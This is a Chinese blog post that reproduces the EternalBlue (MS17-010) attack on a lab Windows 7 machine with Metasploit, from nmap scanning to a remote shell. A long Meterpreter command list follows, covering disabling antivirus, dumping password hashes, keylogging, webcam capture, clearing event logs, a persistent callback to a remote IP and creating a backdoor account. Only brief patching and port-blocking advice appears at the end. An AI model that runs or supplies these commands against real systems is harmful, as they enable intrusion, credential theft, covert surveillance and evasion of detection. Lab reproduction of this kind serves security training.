永恒之蓝漏洞复现

已于 2022-11-09 07:19:11 修改
阅读量373 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 网络安全 安全
于 2022-11-08 22:21:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dl1286670932/article/details/127759813
版权

72955606c2d74d979bfd700013a17ca2.png准备工作:

  1. 靶机 Windows7(已关闭防火墙)IP:192.168.3.86
  2. 攻击机 Kali Linux 
  3. 攻击机和靶机处于同一局域网内

95a60cce055c46c3a1f9a41b8f475d4d.png

使用NMAP信息收集:

可以看到端口135,445,139处于开启状态

8cdba6202aeb46f9927cf9af3cd5c82e.png

打开MSF

msfconsole

27e1fe4bb1164cf2bd787751c0e1dc2f.png  输入命令查询永恒之蓝MSF可用模块:

search ms17_010

exploit/windows/smb/ms17_010_eternablue是攻击模块

auxiliary/scanner/smb/smb_ms17_010是扫描模块

这里直接使用前面的序号代替

set rhosts 192.168.3.86设置攻击目标IP

run或者exploit进行开始攻击

[+]代表目标存在永恒之蓝漏洞

9011a1d22ed647a8a4b5d8316c54e96b.png

攻击之后拿到目标shell

解决中文乱码问题:

Chcp 65001

d7f83d0dbc37432cafbfdb4e2f426f06.png

 渗透常用命令:

chcp 65001                                       #shell 编码乱码
run post/windows/manage/migrate                  #自动进程迁移     
run post/windows/gather/checkvm                  #查看目标主机是否运行在虚拟机上     
run post/windows/manage/killav                   #关闭杀毒软件     
run post/windows/manage/enable_rdp               #开启远程桌面服务     
run post/windows/manage/autoroute                #查看路由信息     
run post/windows/gather/enum_logged_on_users     #列举当前登录的用户     
run post/windows/gather/enum_applications        #列举应用程序     
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码     
run windows/gather/smart_hashdump                #dump出所有用户的hash
clearev                                          #清除事件日志
sysinfo             				 #查看目标主机系统信息
run scraper         				 #查看目标主机详细信息
run hashdump        				 #导出密码的哈希
load kiwi          				 #加载
ps                 				 #查看目标主机进程信息
pwd              				 #查看目标当前目录(windows)
getlwd             				 #查看目标当前目录(Linux)
search -f *.jsp -d e:\               		 #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root         		 #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test    		 #将/root/test.txt上传到目标机的 d:\test\ 目录下
getpid              				 #查看当前Meterpreter Shell的进程
PIDmigrate 1384     				 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            				 #查看主机运行时间
getuid             				 #查看获取的当前权限
getsystem          				 #提权
run  killav        				 #关闭杀毒软件
screenshot         				 #截图
webcam_list        				 #查看目标主机的摄像头
webcam_snap        				 #拍照
webcam_stream      				 #开视频
execute  参数  -f 可执行文件  	 #执行可执行程序
run getgui -u hack -p 123   	 #创建hack用户,密码为123
run getgui -e              			     #开启远程桌面
keyscan_start               			 #开启键盘记录功能
keyscan_dump                			 #显示捕捉到的键盘记录信息
keyscan_stop                			 #停止键盘记录功能
uictl  disable  keyboard    			 #禁止目标使用键盘
uictl  enable   keyboard    			 #允许目标使用键盘
uictl  disable  mouse       			 #禁止目标使用鼠标
uictl  enable   mouse       			 #允许目标使用鼠标
load                       		 #使用扩展库
run				            	 #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接
portfwd add -l 3389 -r 192.168.11.13 -p 3389    #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev                      #清除日志

防御措施:

及时打补丁KB2919355。

开启Windows防火墙,

禁用445.139端口。

 

永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2736
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
网络安全小白学kali———“永恒之蓝
weixin_58457050的博客
04-30 1737
kali
永恒之蓝(MS17-010)
BvxiE的博客
12-26 4065
温馨提醒:纯水文,如果不幸翻到这篇文章,可以立刻关闭!
永恒之蓝EternalBlue复现
aijuzhou1959的博客
07-24 251
0x01 漏洞原理:http://blogs.360.cn/blog/nsa-eternalblue-smb/ 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2...
有关永恒之蓝的一些操作
x_13579的博客
02-04 865
在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面。打开win7的cmd输入ipconfig,查看一下靶机的IP。
Kali--永恒之蓝漏洞复现
最新发布
f1245179815的博客
10-24 1148
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1662
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
2401_84297796的博客
05-03 1070
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
永恒之蓝利用流程及meterpreter的命令使用
L35052634的博客
08-11 1335
(编号0,exploit/windows/smb/ms17_010_eternalblue,为攻击模块,等下我们会使用这个模块进行攻击,编号3,auxiliary/scanner/smb/smb_ms17_010,为扫描模块,探测靶机是否存在该漏洞)第一步:切换为攻击模块(exploit/windows/smb/ms17_010_eternalblue),对其利用“永恒之蓝”的漏洞,先使用。实验准备:攻击机IP:192.168.1.17,靶机IP:192.168.1.9。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
xnxqwzy的博客
08-22 3821
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
永恒之蓝(ms17-010)&&meterpreter模块简单使用
Z_l123的博客
03-09 1893
永恒之蓝(ms17-010) 启动meterpreter msfconsole 查询ms17-010,并使用攻击模块 search ms17-010 use 3 设置目标ip,本机ip,payload set rhosts 192.168.254.130 set lhost 192.168.254.129 set payload windows/x64/meterpreter/reverse_tcp 查看配置 show options 开始攻击 run ...
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 5062
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
kail利用msf工具对ms17-010(永恒之蓝漏洞入侵渗透Win7
qq_50854662的博客
05-16 4861
kail利用msf工具对ms17-010(永恒之蓝漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感
python调用msfconsole全自动永恒之蓝攻击_永恒之蓝-ETERNALBLUE漏洞MS17-010利用过程
weixin_39604819的博客
12-22 797
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担事情起因虽然距离上一次WannaCry席卷全球(17-05-12)已经过去一年多了,现在来复现有炒冷饭的嫌疑,但是还是有价值的参考文章:环境准备Kali:192.168.2.6Win7_SP1:192.168.2.7:默认为Administrator账户无密码WinXP_SP3:192.168.2.4使用metasploit搜索模...
永恒之蓝EternalBlue漏洞复现
weixin_51909453的博客
12-15 1983
永恒之蓝EternalBlue漏洞复现 1.背景 永恒之蓝(EternalBlue)是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB协议漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 2.漏洞原理 永恒之蓝是在Win
网络安全】用永恒之蓝(Eternal blue)测试windows系统的安全
茗染云华 荆挑赋樱
11-30 1675
③metasploit 攻击 windows操作系统:如永恒之蓝漏洞,利用windows操作系统的SMB漏洞可以获取系统最高权限,端口为445。②metasploit:kali最强渗透工具。二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程。②在攻击机的终端,攻击目标地址,使用命令:set RHOSTS 具体目标地址或网段。target port=rport=目标的端口(永恒之蓝漏洞的默认端口=445)
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之蓝漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.youkuaiyun.com/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dylan.017

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值